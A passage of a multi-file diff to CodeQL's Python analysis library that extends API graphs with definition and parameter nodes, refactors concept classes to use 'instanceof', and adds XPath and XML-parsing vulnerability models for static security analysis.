result.getAnImmediateUse() = this
}
}
/**
* Provides the actual implementation of API graphs, cached for performance.
*
@@ -312,23 +434,26 @@ module API {
/** An abstract representative for imports of the module called `name`. */
MkModuleImport(string name) {
// Ignore the following module name for Python 2, as we alias `__builtin__` to `builtins` elsewhere
(name != "__builtin__" or major_version() = 3) and
(name != "__builtin__" or PY::major_version() = 3) and
(
imports(_, name)
or
// When we `import foo.bar.baz` we want to create API graph nodes also for the prefixes
// `foo` and `foo.bar`:
name = any(ImportExpr e | not e.isRelative()).getAnImportedModuleName()
name = any(PY::ImportExpr e | not e.isRelative()).getAnImportedModuleName()
)
or
// The `builtins` module should always be implicitly available
name = "builtins"
} or
/** A use of an API member at the node `nd`. */
MkUse(DataFlow::Node nd) { use(_, _, nd) }
MkUse(DataFlow::Node nd) { use(_, _, nd) } or
MkDef(DataFlow::Node nd) { rhs(_, _, nd) }
class TUse = MkModuleImport or MkUse;
class TDef = MkDef;
/**
* Holds if the dotted module name `sub` refers to the `member` member of `base`.
*
@@ -351,7 +476,7 @@ module API {
* Ignores relative imports, such as `from ..foo.bar import baz`.
*/
private predicate imports(DataFlow::Node imp, string name) {
exists(ImportExprNode iexpr |
exists(PY::ImportExprNode iexpr |
imp.asCfgNode() = iexpr and
not iexpr.getNode().isRelative() and
name = iexpr.getNode().getImportedModuleName()
@@ -374,13 +499,55 @@ module API {
*
* `moduleImport("foo").getMember("bar")`
*/
private TApiNode potential_import_star_base(Scope s) {
private TApiNode potential_import_star_base(PY::Scope s) {
exists(DataFlow::Node n |
n.asCfgNode() = ImportStar::potentialImportStarBase(s) and
use(result, n)
)
}
/**
* Holds if `rhs` is the right-hand side of a definition of a node that should have an
* incoming edge from `base` labeled `lbl` in the API graph.
*/
cached
predicate rhs(TApiNode base, Label::ApiLabel lbl, DataFlow::Node rhs) {
exists(DataFlow::Node def, DataFlow::LocalSourceNode pred |
rhs(base, def) and pred = trackDefNode(def)
|
// from `x` to a definition of `x.prop`
exists(DataFlow::AttrWrite aw | aw = pred.getAnAttributeWrite() |
lbl = Label::memberFromRef(aw) and
rhs = aw.getValue()
)
or
// TODO: I had expected `DataFlow::AttrWrite` to contain the attribute writes from a dict, that's how JS works.
exists(PY::Dict dict, PY::KeyValuePair item |
dict = pred.asExpr() and
dict.getItem(_) = item and
lbl = Label::member(item.getKey().(PY::StrConst).getS()) and
rhs.asExpr() = item.getValue()
)
or
exists(PY::CallableExpr fn | fn = pred.asExpr() |
not fn.getInnerScope().isAsync() and
lbl = Label::return() and
exists(PY::Return ret |
rhs.asExpr() = ret.getValue() and
ret.getScope() = fn.getInnerScope()
)
)
)
or
argumentPassing(base, lbl, rhs)
or
exists(DataFlow::LocalSourceNode src, DataFlow::AttrWrite aw |
use(base, src) and aw = trackUseNode(src).getAnAttributeWrite() and rhs = aw.getValue()
|
lbl = Label::memberFromRef(aw)
)
}
/**
* Holds if `ref` is a use of a node that should have an incoming edge from `base` labeled
* `lbl` in the API graph.
@@ -399,7 +566,7 @@ module API {
|
// Referring to an attribute on a node that is a use of `base`:
lbl = Label::memberFromRef(ref) and
ref = pred.getAnAttributeReference()
ref = pred.getAnAttributeRead()
or
// Calling a node that is a use of `base`
lbl = Label::return() and
@@ -408,7 +575,7 @@ module API {
// Subclassing a node
lbl = Label::subclass() and
exists(DataFlow::Node superclass | pred.flowsTo(superclass) |
ref.asExpr().(ClassExpr).getABase() = superclass.asExpr()
ref.asExpr().(PY::ClassExpr).getABase() = superclass.asExpr()
)
or
// awaiting
@@ -419,12 +586,26 @@ module API {
)
)
or
exists(DataFlow::Node def, PY::CallableExpr fn |
rhs(base, def) and fn = trackDefNode(def).asExpr()
|
exists(int i |
lbl = Label::parameter(i) and
ref.asExpr() = fn.getInnerScope().getArg(i)
)
or
exists(string name |
lbl = Label::keywordParameter(name) and
ref.asExpr() = fn.getInnerScope().getArgByName(name)
)
)
or
// Built-ins, treated as members of the module `builtins`
base = MkModuleImport("builtins") and
lbl = Label::member(any(string name | ref = Builtins::likelyBuiltin(name)))
or
// Unknown variables that may belong to a module imported with `import *`
exists(Scope s |
exists(PY::Scope s |
base = potential_import_star_base(s) and
lbl =
Label::member(any(string name |
@@ -444,7 +625,7 @@ module API {
)
or
// Ensure the Python 2 `__builtin__` module gets the name of the Python 3 `builtins` module.
major_version() = 2 and
PY::major_version() = 2 and
nd = MkModuleImport("builtins") and
imports(ref, "__builtin__")
or
@@ -466,6 +647,42 @@ module API {
exists(DataFlow::TypeTracker t2 | result = trackUseNode(src, t2).track(t2, t))
}
/**
* Holds if `arg` is passed as an argument to a use of `base`.
*
* `lbl` is represents which parameter of the function was passed. Either a numbered parameter, or a keyword parameter.
*/
private predicate argumentPassing(TApiNode base, Label::ApiLabel lbl, DataFlow::Node arg) {
exists(DataFlow::Node use, DataFlow::LocalSourceNode pred |
use(base, use) and pred = trackUseNode(use)
|
exists(int i |
lbl = Label::parameter(i) and
arg = pred.getACall().getArg(i)
)
or
exists(string name | lbl = Label::keywordParameter(name) |
arg = pred.getACall().getArgByName(name)
)
)
}
/**
* Gets a node that inter-procedurally flows into `nd`, which is a definition of some node.
*/
cached
DataFlow::LocalSourceNode trackDefNode(DataFlow::Node nd) {
result = trackDefNode(nd, DataFlow::TypeBackTracker::end())
}
private DataFlow::LocalSourceNode trackDefNode(DataFlow::Node nd, DataFlow::TypeBackTracker t) {
t.start() and
rhs(_, nd) and
result = nd.getALocalSource()
or
exists(DataFlow::TypeBackTracker t2 | result = trackDefNode(nd, t2).backtrack(t2, t))
}
/**
* Gets a data-flow node to which `src`, which is a use of an API-graph node, flows.
*
@@ -473,10 +690,17 @@ module API {
*/
cached
DataFlow::LocalSourceNode trackUseNode(DataFlow::LocalSourceNode src) {
Stages::TypeTracking::ref() and
result = trackUseNode(src, DataFlow::TypeTracker::end()) and
not result instanceof DataFlow::ModuleVariableNode
}
/**
* Holds if `rhs` is the right-hand side of a definition of node `nd`.
*/
cached
predicate rhs(TApiNode nd, DataFlow::Node rhs) { nd = MkDef(rhs) }
/**
* Holds if there is an edge from `pred` to `succ` in the API graph that is labeled with `lbl`.
*/
@@ -485,8 +709,7 @@ module API {
/* There's an edge from the root node for each imported module. */
exists(string m |
pred = MkRoot() and
lbl = Label::mod(m)
|
lbl = Label::mod(m) and
succ = MkModuleImport(m) and
// Only allow undotted names to count as base modules.
not m.matches("%.%")
@@ -503,6 +726,11 @@ module API {
use(pred, lbl, ref) and
succ = MkUse(ref)
)
or
exists(DataFlow::Node rhs |
rhs(pred, lbl, rhs) and
succ = MkDef(rhs)
)
}
/**
@@ -530,23 +758,34 @@ module API {
private import semmle.python.dataflow.new.internal.ImportStar
newtype TLabel =
MkLabelModule(string mod) { exists(Impl::MkModuleImport(mod)) } or
MkLabelModule(string mod) {
exists(Impl::MkModuleImport(mod)) and
not mod.matches("%.%") // only top level modules count as base modules
} or
MkLabelMember(string member) {
member = any(DataFlow::AttrRef pr).getAttributeName() or
exists(Builtins::likelyBuiltin(member)) or
ImportStar::namePossiblyDefinedInImportStar(_, member, _) or
Impl::prefix_member(_, member, _)
Impl::prefix_member(_, member, _) or
member = any(PY::Dict d).getAnItem().(PY::KeyValuePair).getKey().(PY::StrConst).getS()
} or
MkLabelUnknownMember() or
MkLabelParameter(int i) {
none() // TODO: Fill in when adding def nodes
exists(any(DataFlow::CallCfgNode c).getArg(i))
or
exists(any(PY::Function f).getArg(i))
} or
MkLabelKeywordParameter(string name) {
exists(any(DataFlow::CallCfgNode c).getArgByName(name))
or
exists(any(PY::Function f).getArgByName(name))
} or
MkLabelReturn() or
MkLabelSubclass() or
MkLabelAwait()
/** A label for a module. */
class LabelModule extends ApiLabel {
class LabelModule extends ApiLabel, MkLabelModule {
string mod;
LabelModule() { this = MkLabelModule(mod) }
@@ -558,7 +797,7 @@ module API {
}
/** A label for the member named `prop`. */
class LabelMember extends ApiLabel {
class LabelMember extends ApiLabel, MkLabelMember {
string member;
LabelMember() { this = MkLabelMember(member) }
@@ -570,14 +809,12 @@ module API {
}
/** A label for a member with an unknown name. */
class LabelUnknownMember extends ApiLabel {
LabelUnknownMember() { this = MkLabelUnknownMember() }
class LabelUnknownMember extends ApiLabel, MkLabelUnknownMember {
override string toString() { result = "getUnknownMember()" }
}
/** A label for parameter `i`. */
class LabelParameter extends ApiLabel {
class LabelParameter extends ApiLabel, MkLabelParameter {
int i;
LabelParameter() { this = MkLabelParameter(i) }
@@ -588,24 +825,30 @@ module API {
int getIndex() { result = i }
}
/** A label that gets the return value of a function. */
class LabelReturn extends ApiLabel {
LabelReturn() { this = MkLabelReturn() }
/** A label for a keyword parameter `name`. */
class LabelKeywordParameter extends ApiLabel, MkLabelKeywordParameter {
string name;
LabelKeywordParameter() { this = MkLabelKeywordParameter(name) }
override string toString() { result = "getKeywordParameter(\"" + name + "\")" }
/** Gets the name of the parameter for this label. */
string getName() { result = name }
}
/** A label that gets the return value of a function. */
class LabelReturn extends ApiLabel, MkLabelReturn {
override string toString() { result = "getReturn()" }
}
/** A label that gets the subclass of a class. */
class LabelSubclass extends ApiLabel {
LabelSubclass() { this = MkLabelSubclass() }
class LabelSubclass extends ApiLabel, MkLabelSubclass {
override string toString() { result = "getASubclass()" }
}
/** A label for awaited values. */
class LabelAwait extends ApiLabel {
LabelAwait() { this = MkLabelAwait() }
class LabelAwait extends ApiLabel, MkLabelAwait {
override string toString() { result = "getAwaited()" }
}
}
@@ -620,13 +863,19 @@ module API {
LabelUnknownMember unknownMember() { any() }
/** Gets the `member` edge label for the given attribute reference. */
ApiLabel memberFromRef(DataFlow::AttrRef pr) {
result = member(pr.getAttributeName())
ApiLabel memberFromRef(DataFlow::AttrRef ref) {
result = member(ref.getAttributeName())
or
not exists(pr.getAttributeName()) and
not exists(ref.getAttributeName()) and
result = unknownMember()
}
/** Gets the `parameter` edge label for parameter `i`. */
LabelParameter parameter(int i) { result.getIndex() = i }
/** Gets the `parameter` edge label for the keyword parameter `name`. */
LabelKeywordParameter keywordParameter(string name) { result.getName() = name }
/** Gets the `return` edge label. */
LabelReturn return() { any() }

View File

@@ -1,6 +1,7 @@
import python
private import semmle.python.internal.CachedStages
/** Syntactic node (Class, Function, Module, Expr, Stmt or Comprehension) corresponding to a flow node */
/** A syntactic node (Class, Function, Module, Expr, Stmt or Comprehension) corresponding to a flow node */
abstract class AstNode extends AstNode_ {
/*
* Special comment for documentation generation.
@@ -17,9 +18,14 @@ abstract class AstNode extends AstNode_ {
* NOTE: For some statements and other purely syntactic elements,
* there may not be a `ControlFlowNode`
*/
ControlFlowNode getAFlowNode() { py_flow_bb_node(result, this, _, _) }
cached
ControlFlowNode getAFlowNode() {
Stages::AST::ref() and
py_flow_bb_node(result, this, _, _)
}
/** Gets the location for this AST node */
cached
Location getLocation() { none() }
/**
@@ -35,6 +41,7 @@ abstract class AstNode extends AstNode_ {
* Expr.getASubExpression(), Stmt.getASubStatement(), Stmt.getASubExpression() or
* Scope.getAStmt().
*/
cached
abstract AstNode getAChildNode();
/**
@@ -44,12 +51,16 @@ abstract class AstNode extends AstNode_ {
* Expr.getASubExpression(), Stmt.getASubStatement(), Stmt.getASubExpression() or
* Scope.getAStmt() applied to the parent.
*/
AstNode getParentNode() { result.getAChildNode() = this }
cached
AstNode getParentNode() {
Stages::AST::ref() and
result.getAChildNode() = this
}
/** Whether this contains `inner` syntactically */
predicate contains(AstNode inner) { this.getAChildNode+() = inner }
pragma[noinline]
pragma[nomagic]
private predicate containsInScope(AstNode inner, Scope scope) {
this.contains(inner) and
not inner instanceof Scope and
@@ -61,31 +72,31 @@ abstract class AstNode extends AstNode_ {
}
/* Parents */
/** Internal implementation class */
/** The parent of a `Function`. Internal implementation class */
class FunctionParent extends FunctionParent_ { }
/** Internal implementation class */
/** The parent of an `Arguments` node. Internal implementation class */
class ArgumentsParent extends ArgumentsParent_ { }
/** Internal implementation class */
/** The parent of an `ExprList`. Internal implementation class */
class ExprListParent extends ExprListParent_ { }
/** Internal implementation class */
/** The parent of an `ExprContext`. Internal implementation class */
class ExprContextParent extends ExprContextParent_ { }
/** Internal implementation class */
/** The parent of a `StmtList`. Internal implementation class */
class StmtListParent extends StmtListParent_ { }
/** Internal implementation class */
/** The parent of a `StrList`. Internal implementation class */
class StrListParent extends StrListParent_ { }
/** Internal implementation class */
/** The parent of an `Expr`. Internal implementation class */
class ExprParent extends ExprParent_ { }
/** Internal implementation class */
/** The parent of a `PatternList`. Internal implementation class */
class PatternListParent extends PatternListParent_ { }
/** Internal implementation class */
/** The parent of a `Pattern`. Internal implementation class */
class PatternParent extends PatternParent_ { }
class DictItem extends DictItem_, AstNode {
@@ -106,9 +117,16 @@ class Comprehension extends Comprehension_, AstNode {
override string toString() { result = "Comprehension" }
override Location getLocation() { result = Comprehension_.super.getLocation() }
override Location getLocation() {
Stages::AST::ref() and
result = Comprehension_.super.getLocation()
}
override AstNode getAChildNode() { result = this.getASubExpression() }
pragma[nomagic]
override AstNode getAChildNode() {
Stages::AST::ref() and
result = this.getASubExpression()
}
Expr getASubExpression() {
result = this.getIter() or
@@ -120,7 +138,7 @@ class Comprehension extends Comprehension_, AstNode {
class BytesOrStr extends BytesOrStr_ { }
/**
* Part of a string literal formed by implicit concatenation.
* A part of a string literal formed by implicit concatenation.
* For example the string literal "abc" expressed in the source as `"a" "b" "c"`
* would be composed of three `StringPart`s.
*/

View File

@@ -85,12 +85,6 @@ class ClassDef extends Assign {
/** The scope of a class. This is the scope of all the statements within the class definition */
class Class extends Class_, Scope, AstNode {
/**
* Use getADecorator() instead of getDefinition().getADecorator()
* Use getMetaClass() instead of getDefinition().getMetaClass()
*/
deprecated ClassExpr getDefinition() { result = this.getParent() }
/** Gets a defined init method of this class */
Function getInitMethod() { result.getScope() = this and result.isInitMethod() }

View File

@@ -59,7 +59,7 @@ class CommentBlock extends @py_comment {
/** Gets a textual representation of this element. */
string toString() { result = "Comment block" }
/** The length of this comment block (in comments) */
/** Gets the length of this comment block (in comments) */
int length() { result = max(int i | comment_block_part(this, _, i)) }
/**

View File

@@ -76,22 +76,22 @@ class CompareOp extends int {
}
}
/** The `CompareOp` for "equals". */
/** Gets the `CompareOp` for "equals". */
CompareOp eq() { result = 1 }
/** The `CompareOp` for "not equals". */
/** Gets the `CompareOp` for "not equals". */
CompareOp ne() { result = 2 }
/** The `CompareOp` for "less than". */
/** Gets the `CompareOp` for "less than". */
CompareOp lt() { result = 3 }
/** The `CompareOp` for "less than or equal to". */
/** Gets the `CompareOp` for "less than or equal to". */
CompareOp le() { result = 4 }
/** The `CompareOp` for "greater than". */
/** Gets the `CompareOp` for "greater than". */
CompareOp gt() { result = 5 }
/** The `CompareOp` for "greater than or equal to". */
/** Gets the `CompareOp` for "greater than or equal to". */
CompareOp ge() { result = 6 }
/* Workaround precision limits in floating point numbers */

View File

@@ -1,6 +1,6 @@
import python
/** Base class for list, set and dictionary comprehensions, and generator expressions. */
/** The base class for list, set and dictionary comprehensions, and generator expressions. */
abstract class Comp extends Expr {
abstract Function getFunction();

View File

@@ -17,13 +17,9 @@ private import semmle.python.Frameworks
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `SystemCommandExecution::Range` instead.
*/
class SystemCommandExecution extends DataFlow::Node {
SystemCommandExecution::Range range;
SystemCommandExecution() { this = range }
class SystemCommandExecution extends DataFlow::Node instanceof SystemCommandExecution::Range {
/** Gets the argument that specifies the command to be executed. */
DataFlow::Node getCommand() { result = range.getCommand() }
DataFlow::Node getCommand() { result = super.getCommand() }
}
/** Provides a class for modeling new system-command execution APIs. */
@@ -48,13 +44,9 @@ module SystemCommandExecution {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `FileSystemAccess::Range` instead.
*/
class FileSystemAccess extends DataFlow::Node {
FileSystemAccess::Range range;
FileSystemAccess() { this = range }
class FileSystemAccess extends DataFlow::Node instanceof FileSystemAccess::Range {
/** Gets an argument to this file system access that is interpreted as a path. */
DataFlow::Node getAPathArgument() { result = range.getAPathArgument() }
DataFlow::Node getAPathArgument() { result = super.getAPathArgument() }
}
/** Provides a class for modeling new file system access APIs. */
@@ -78,14 +70,12 @@ module FileSystemAccess {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `FileSystemWriteAccess::Range` instead.
*/
class FileSystemWriteAccess extends FileSystemAccess {
override FileSystemWriteAccess::Range range;
class FileSystemWriteAccess extends FileSystemAccess instanceof FileSystemWriteAccess::Range {
/**
* Gets a node that represents data to be written to the file system (possibly with
* some transformation happening before it is written, like JSON encoding).
*/
DataFlow::Node getADataNode() { result = range.getADataNode() }
DataFlow::Node getADataNode() { result = super.getADataNode() }
}
/** Provides a class for modeling new file system writes. */
@@ -111,13 +101,9 @@ module Path {
* A data-flow node that performs path normalization. This is often needed in order
* to safely access paths.
*/
class PathNormalization extends DataFlow::Node {
PathNormalization::Range range;
PathNormalization() { this = range }
class PathNormalization extends DataFlow::Node instanceof PathNormalization::Range {
/** Gets an argument to this path normalization that is interpreted as a path. */
DataFlow::Node getPathArg() { result = range.getPathArg() }
DataFlow::Node getPathArg() { result = super.getPathArg() }
}
/** Provides a class for modeling new path normalization APIs. */
@@ -133,12 +119,10 @@ module Path {
}
/** A data-flow node that checks that a path is safe to access. */
class SafeAccessCheck extends DataFlow::BarrierGuard {
SafeAccessCheck::Range range;
SafeAccessCheck() { this = range }
override predicate checks(ControlFlowNode node, boolean branch) { range.checks(node, branch) }
class SafeAccessCheck extends DataFlow::BarrierGuard instanceof SafeAccessCheck::Range {
override predicate checks(ControlFlowNode node, boolean branch) {
SafeAccessCheck::Range.super.checks(node, branch)
}
}
/** Provides a class for modeling new path safety checks. */
@@ -160,22 +144,18 @@ module Path {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `Decoding::Range` instead.
*/
class Decoding extends DataFlow::Node {
Decoding::Range range;
Decoding() { this = range }
class Decoding extends DataFlow::Node instanceof Decoding::Range {
/** Holds if this call may execute code embedded in its input. */
predicate mayExecuteInput() { range.mayExecuteInput() }
predicate mayExecuteInput() { super.mayExecuteInput() }
/** Gets an input that is decoded by this function. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
/** Gets the output that contains the decoded data produced by this function. */
DataFlow::Node getOutput() { result = range.getOutput() }
DataFlow::Node getOutput() { result = super.getOutput() }
/** Gets an identifier for the format this function decodes from, such as "JSON". */
string getFormat() { result = range.getFormat() }
string getFormat() { result = super.getFormat() }
}
/** Provides a class for modeling new decoding mechanisms. */
@@ -226,19 +206,15 @@ private class DecodingAdditionalTaintStep extends TaintTracking::AdditionalTaint
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `Encoding::Range` instead.
*/
class Encoding extends DataFlow::Node {
Encoding::Range range;
Encoding() { this = range }
class Encoding extends DataFlow::Node instanceof Encoding::Range {
/** Gets an input that is encoded by this function. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
/** Gets the output that contains the encoded data produced by this function. */
DataFlow::Node getOutput() { result = range.getOutput() }
DataFlow::Node getOutput() { result = super.getOutput() }
/** Gets an identifier for the format this function decodes from, such as "JSON". */
string getFormat() { result = range.getFormat() }
string getFormat() { result = super.getFormat() }
}
/** Provides a class for modeling new encoding mechanisms. */
@@ -280,13 +256,9 @@ private class EncodingAdditionalTaintStep extends TaintTracking::AdditionalTaint
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `Logging::Range` instead.
*/
class Logging extends DataFlow::Node {
Logging::Range range;
Logging() { this = range }
class Logging extends DataFlow::Node instanceof Logging::Range {
/** Gets an input that is logged. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
}
/** Provides a class for modeling new logging mechanisms. */
@@ -309,13 +281,9 @@ module Logging {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `CodeExecution::Range` instead.
*/
class CodeExecution extends DataFlow::Node {
CodeExecution::Range range;
CodeExecution() { this = range }
class CodeExecution extends DataFlow::Node instanceof CodeExecution::Range {
/** Gets the argument that specifies the code to be executed. */
DataFlow::Node getCode() { result = range.getCode() }
DataFlow::Node getCode() { result = super.getCode() }
}
/** Provides a class for modeling new dynamic code execution APIs. */
@@ -334,6 +302,7 @@ module CodeExecution {
/**
* A data-flow node that constructs an SQL statement.
*
* Often, it is worthy of an alert if an SQL statement is constructed such that
* executing it would be a security risk.
*
@@ -342,24 +311,23 @@ module CodeExecution {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `SqlConstruction::Range` instead.
*/
class SqlConstruction extends DataFlow::Node {
SqlConstruction::Range range;
SqlConstruction() { this = range }
class SqlConstruction extends DataFlow::Node instanceof SqlConstruction::Range {
/** Gets the argument that specifies the SQL statements to be constructed. */
DataFlow::Node getSql() { result = range.getSql() }
DataFlow::Node getSql() { result = super.getSql() }
}
/** Provides a class for modeling new SQL execution APIs. */
module SqlConstruction {
/**
* A data-flow node that constructs an SQL statement.
*
* Often, it is worthy of an alert if an SQL statement is constructed such that
* executing it would be a security risk.
*
* If it is important that the SQL statement is indeed executed, then use `SQLExecution`.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `SqlExecution` instead.
* extend `SqlConstruction` instead.
*/
abstract class Range extends DataFlow::Node {
/** Gets the argument that specifies the SQL statements to be constructed. */
@@ -376,13 +344,9 @@ module SqlConstruction {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `SqlExecution::Range` instead.
*/
class SqlExecution extends DataFlow::Node {
SqlExecution::Range range;
SqlExecution() { this = range }
class SqlExecution extends DataFlow::Node instanceof SqlExecution::Range {
/** Gets the argument that specifies the SQL statements to be executed. */
DataFlow::Node getSql() { result = range.getSql() }
DataFlow::Node getSql() { result = super.getSql() }
}
/** Provides a class for modeling new SQL execution APIs. */
@@ -408,22 +372,18 @@ module SqlExecution {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `RegexExecution::Range` instead.
*/
class RegexExecution extends DataFlow::Node {
RegexExecution::Range range;
RegexExecution() { this = range }
class RegexExecution extends DataFlow::Node instanceof RegexExecution::Range {
/** Gets the data flow node for the regex being executed by this node. */
DataFlow::Node getRegex() { result = range.getRegex() }
DataFlow::Node getRegex() { result = super.getRegex() }
/** Gets a dataflow node for the string to be searched or matched against. */
DataFlow::Node getString() { result = range.getString() }
DataFlow::Node getString() { result = super.getString() }
/**
* Gets the name of this regex execution, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
string getName() { result = range.getName() }
string getName() { result = super.getName() }
}
/** Provides classes for modeling new regular-expression execution APIs. */
@@ -449,6 +409,156 @@ module RegexExecution {
}
}
/** Provides classes for modeling XML-related APIs. */
module XML {
/**
* A data-flow node that constructs an XPath expression.
*
* Often, it is worthy of an alert if an XPath expression is constructed such that
* executing it would be a security risk.
*
* If it is important that the XPath expression is indeed executed, then use `XPathExecution`.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `XPathConstruction::Range` instead.
*/
class XPathConstruction extends DataFlow::Node instanceof XPathConstruction::Range {
/** Gets the argument that specifies the XPath expressions to be constructed. */
DataFlow::Node getXPath() { result = super.getXPath() }
/**
* Gets the name of this XPath expression construction, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
string getName() { result = super.getName() }
}
/** Provides a class for modeling new XPath construction APIs. */
module XPathConstruction {
/**
* A data-flow node that constructs an XPath expression.
*
* Often, it is worthy of an alert if an XPath expression is constructed such that
* executing it would be a security risk.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XPathConstruction` instead.
*/
abstract class Range extends DataFlow::Node {
/** Gets the argument that specifies the XPath expressions to be constructed. */
abstract DataFlow::Node getXPath();
/**
* Gets the name of this XPath expression construction, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
abstract string getName();
}
}
/**
* A data-flow node that executes a xpath expression.
*
* If the context of interest is such that merely constructing an XPath expression
* would be valuabe to report, then consider using `XPathConstruction`.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `XPathExecution::Range` instead.
*/
class XPathExecution extends DataFlow::Node instanceof XPathExecution::Range {
/** Gets the data flow node for the XPath expression being executed by this node. */
DataFlow::Node getXPath() { result = super.getXPath() }
/**
* Gets the name of this XPath expression execution, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
string getName() { result = super.getName() }
}
/** Provides classes for modeling new regular-expression execution APIs. */
module XPathExecution {
/**
* A data-flow node that executes a XPath expression.
*
* If the context of interest is such that merely constructing an XPath expression
* would be valuabe to report, then consider using `XPathConstruction`.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XPathExecution` instead.
*/
abstract class Range extends DataFlow::Node {
/** Gets the data flow node for the XPath expression being executed by this node. */
abstract DataFlow::Node getXPath();
/**
* Gets the name of this xpath expression execution, typically the name of an executing method.
* This is used for nice alert messages and should include the module if possible.
*/
abstract string getName();
}
}
/**
* A kind of XML vulnerability.
*
* See overview of kinds at https://pypi.org/project/defusedxml/#python-xml-libraries
*
* See PoC at `python/PoCs/XmlParsing/PoC.py` for some tests of vulnerable XML parsing.
*/
class XmlParsingVulnerabilityKind extends string {
XmlParsingVulnerabilityKind() { this in ["XML bomb", "XXE", "DTD retrieval"] }
/**
* Holds for XML bomb vulnerability kind, such as 'Billion Laughs' and 'Quadratic
* Blowup'.
*
* While a parser could technically be vulnerable to one and not the other, from our
* point of view the interesting part is that it IS vulnerable to these types of
* attacks, and not so much which one specifically works. In practice I haven't seen
* a parser that is vulnerable to one and not the other.
*/
predicate isXmlBomb() { this = "XML bomb" }
/** Holds for XXE vulnerability kind. */
predicate isXxe() { this = "XXE" }
/** Holds for DTD retrieval vulnerability kind. */
predicate isDtdRetrieval() { this = "DTD retrieval" }
}
/**
* A data-flow node that parses XML.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XmlParsing` instead.
*/
class XmlParsing extends Decoding instanceof XmlParsing::Range {
/**
* Holds if this XML parsing is vulnerable to `kind`.
*/
predicate vulnerableTo(XmlParsingVulnerabilityKind kind) { super.vulnerableTo(kind) }
}
/** Provides classes for modeling XML parsing APIs. */
module XmlParsing {
/**
* A data-flow node that parses XML.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `XmlParsing` instead.
*/
abstract class Range extends Decoding::Range {
/**
* Holds if this XML parsing is vulnerable to `kind`.
*/
abstract predicate vulnerableTo(XmlParsingVulnerabilityKind kind);
override string getFormat() { result = "XML" }
}
}
}
/** Provides classes for modeling LDAP-related APIs. */
module LDAP {
/**
@@ -457,16 +567,12 @@ module LDAP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `LDAPQuery::Range` instead.
*/
class LdapExecution extends DataFlow::Node {
LdapExecution::Range range;
LdapExecution() { this = range }
class LdapExecution extends DataFlow::Node instanceof LdapExecution::Range {
/** Gets the argument containing the filter string. */
DataFlow::Node getFilter() { result = range.getFilter() }
DataFlow::Node getFilter() { result = super.getFilter() }
/** Gets the argument containing the base DN. */
DataFlow::Node getBaseDn() { result = range.getBaseDn() }
DataFlow::Node getBaseDn() { result = super.getBaseDn() }
}
/** Provides classes for modeling new LDAP query execution-related APIs. */
@@ -494,26 +600,23 @@ module LDAP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `Escaping::Range` instead.
*/
class Escaping extends DataFlow::Node {
Escaping::Range range;
class Escaping extends DataFlow::Node instanceof Escaping::Range {
Escaping() {
this = range and
// escapes that don't have _both_ input/output defined are not valid
exists(range.getAnInput()) and
exists(range.getOutput())
exists(super.getAnInput()) and
exists(super.getOutput())
}
/** Gets an input that will be escaped. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
/** Gets the output that contains the escaped data. */
DataFlow::Node getOutput() { result = range.getOutput() }
DataFlow::Node getOutput() { result = super.getOutput() }
/**
* Gets the context that this function escapes for, such as `html`, or `url`.
*/
string getKind() { result = range.getKind() }
string getKind() { result = super.getKind() }
}
/** Provides a class for modeling new escaping APIs. */
@@ -571,7 +674,7 @@ module Escaping {
* `<p>{}</p>`.
*/
class HtmlEscaping extends Escaping {
HtmlEscaping() { range.getKind() = Escaping::getHtmlKind() }
HtmlEscaping() { super.getKind() = Escaping::getHtmlKind() }
}
/**
@@ -579,7 +682,7 @@ class HtmlEscaping extends Escaping {
* the body of a regex.
*/
class RegexEscaping extends Escaping {
RegexEscaping() { range.getKind() = Escaping::getRegexKind() }
RegexEscaping() { super.getKind() = Escaping::getRegexKind() }
}
/**
@@ -587,14 +690,14 @@ class RegexEscaping extends Escaping {
* in an LDAP search.
*/
class LdapDnEscaping extends Escaping {
LdapDnEscaping() { range.getKind() = Escaping::getLdapDnKind() }
LdapDnEscaping() { super.getKind() = Escaping::getLdapDnKind() }
}
/**
* An escape of a string so it can be safely used as a filter in an LDAP search.
*/
class LdapFilterEscaping extends Escaping {
LdapFilterEscaping() { range.getKind() = Escaping::getLdapFilterKind() }
LdapFilterEscaping() { super.getKind() = Escaping::getLdapFilterKind() }
}
/** Provides classes for modeling HTTP-related APIs. */
@@ -613,29 +716,25 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `RouteSetup::Range` instead.
*/
class RouteSetup extends DataFlow::Node {
RouteSetup::Range range;
RouteSetup() { this = range }
class RouteSetup extends DataFlow::Node instanceof RouteSetup::Range {
/** Gets the URL pattern for this route, if it can be statically determined. */
string getUrlPattern() { result = range.getUrlPattern() }
string getUrlPattern() { result = super.getUrlPattern() }
/**
* Gets a function that will handle incoming requests for this route, if any.
*
* NOTE: This will be modified in the near future to have a `RequestHandler` result, instead of a `Function`.
*/
Function getARequestHandler() { result = range.getARequestHandler() }
